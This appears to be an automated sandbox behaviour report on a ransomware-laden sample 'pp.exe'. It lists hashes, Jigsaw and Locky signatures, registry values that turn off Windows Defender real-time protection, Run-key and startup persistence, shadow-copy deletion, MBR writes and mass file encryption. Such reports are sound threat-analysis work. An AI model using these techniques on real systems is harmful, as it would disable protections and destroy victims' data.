Analysis
-
max time kernel
611s -
max time network
615s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-08-2024 01:55
Behavioral task
behavioral1
Sample
pp.exe
Resource
win10v2004-20240802-en
Errors
General
-
Target
pp.exe
-
Size
7.4MB
-
MD5
67e4ed31a1f93cfe8e39fa71c36712aa
-
SHA1
0b9aaf8d7fc079d5c92999c9e83f78d4cc599e89
-
SHA256
4e49278775abf88be3be8aa7851cf854b901f1293b6055345d2a6c4ba6bdbf5d
-
SHA512
b93d86c0c39e9668c1db50035cb7127e8e560e51cf5a925d78769d126dfdcb9df771ed2b1ab8ef68c80860a93a7ec912d105b0569af287a80f683a5cc18589e0
-
SSDEEP
196608:VU7W4FMIZETKwjPePdrQJiWrBd1WutYPjo:wWQETKwvJiWT1WWao
Malware Config
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/5696-5338-0x00000000001A0000-0x00000000001BA000-memory.dmp disable_win_def behavioral1/memory/656-5378-0x00000000009D0000-0x00000000009EC000-memory.dmp disable_win_def -
Jigsaw Ransomware
Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.
-
Locky
Ransomware strain released in 2016, with advanced features like anti-analysis.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (190) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (3726) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 132 6008 mshta.exe 134 6008 mshta.exe 137 6008 mshta.exe 142 1876 mshta.exe 143 5924 mshta.exe -
Downloads MZ/PE file
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Executes dropped EXE 5 IoCs
pid Process 4596 drpbx.exe 6952 svchost.exe 6796 protect.exe 5256 assembler.exe 4492 overwrite.exe -
Loads dropped DLL 3 IoCs
pid Process 2452 pp.exe 2452 pp.exe 2452 pp.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/5460-5529-0x0000000000E70000-0x00000000010FE000-memory.dmp upx behavioral1/memory/5460-5725-0x0000000000E70000-0x00000000010FE000-memory.dmp upx -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" jigsaw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" jigsaw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" jigsaw.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" jigsaw.exe -
pid Process 412 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 124 raw.githubusercontent.com 125 raw.githubusercontent.com 91 raw.githubusercontent.com 117 raw.githubusercontent.com 129 raw.githubusercontent.com 140 raw.githubusercontent.com 76 camo.githubusercontent.com 77 camo.githubusercontent.com 78 camo.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 overwrite.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/5460-5725-0x0000000000E70000-0x00000000010FE000-memory.dmp autoit_exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-96_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-black_scale-200.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Ear.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-16_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Sun.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\ui-strings.js drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\ui-strings.js drpbx.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\190.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\ui-strings.js.fun drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-64_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailSmallTile.scale-125.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\selector.js drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-32_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailBadge.scale-125.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr_2x.gif.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-100_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageLargeTile.scale-150_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-20_contrast-white.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\core_icons.png drpbx.exe File created C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat.fun drpbx.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\Maple.gif drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Outlook.scale-250.png drpbx.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\tzdb.dat drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-100_contrast-high.png drpbx.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-180.png drpbx.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-125_contrast-black.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js.fun drpbx.exe File created C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-96_altform-unplated.png drpbx.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] drpbx.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg.fun drpbx.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\ClientARMRefer2019_eula.txt.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png drpbx.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\LargeTile.scale-125.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js.fun drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-16.png drpbx.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt drpbx.exe File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\AppxManifest.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-36.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_BadgeLogo.scale-100.png drpbx.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png.fun drpbx.exe File created C:\Program Files\Microsoft Office\root\rsod\proof.fr-fr.msi.16.fr-fr.tree.dat.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-80_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\ThankYou\GenericEnglish-2.jpg drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\LibrarySquare150x150Logo.scale-125_contrast-white.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-64_altform-unplated.png drpbx.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1600 sc.exe 4508 sc.exe 5304 sc.exe 5840 sc.exe 1156 sc.exe 2748 sc.exe 4580 sc.exe 3020 sc.exe 4884 sc.exe 5444 sc.exe 6228 sc.exe 6136 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 131.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 131.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Locky.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language protect.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7164 cmd.exe 5692 PING.EXE 7088 cmd.exe 6068 PING.EXE 4188 cmd.exe 1764 PING.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Interacts with shadow copies 3 TTPs 28 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6224 vssadmin.exe 7032 vssadmin.exe 5500 vssadmin.exe 1600 vssadmin.exe 536 vssadmin.exe 7144 vssadmin.exe 6444 vssadmin.exe 468 vssadmin.exe 5384 vssadmin.exe 5564 vssadmin.exe 6184 vssadmin.exe 5748 vssadmin.exe 1536 vssadmin.exe 5616 vssadmin.exe 5904 vssadmin.exe 5516 vssadmin.exe 5868 vssadmin.exe 6244 vssadmin.exe 6712 vssadmin.exe 6392 vssadmin.exe 5140 vssadmin.exe 6992 vssadmin.exe 4772 vssadmin.exe 6032 vssadmin.exe 4692 vssadmin.exe 3612 vssadmin.exe 4576 vssadmin.exe 448 vssadmin.exe -
Kills process with taskkill 9 IoCs
pid Process 2528 taskkill.exe 5040 taskkill.exe 2408 taskkill.exe 4560 taskkill.exe 5196 taskkill.exe 5444 taskkill.exe 3008 taskkill.exe 5540 taskkill.exe 5912 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2392887640-1187051047-2909758433-1000\{4D1E90C5-DB49-40CE-BCC3-B735F4F85241} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings OpenWith.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 7076 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
pid Process 6068 PING.EXE 1764 PING.EXE 5692 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5088 msedge.exe 5088 msedge.exe 1928 msedge.exe 1928 msedge.exe 1580 identity_helper.exe 1580 identity_helper.exe 2560 msedge.exe 2560 msedge.exe 3780 msedge.exe 3780 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 3344 msedge.exe 3344 msedge.exe 3464 msedge.exe 3464 msedge.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 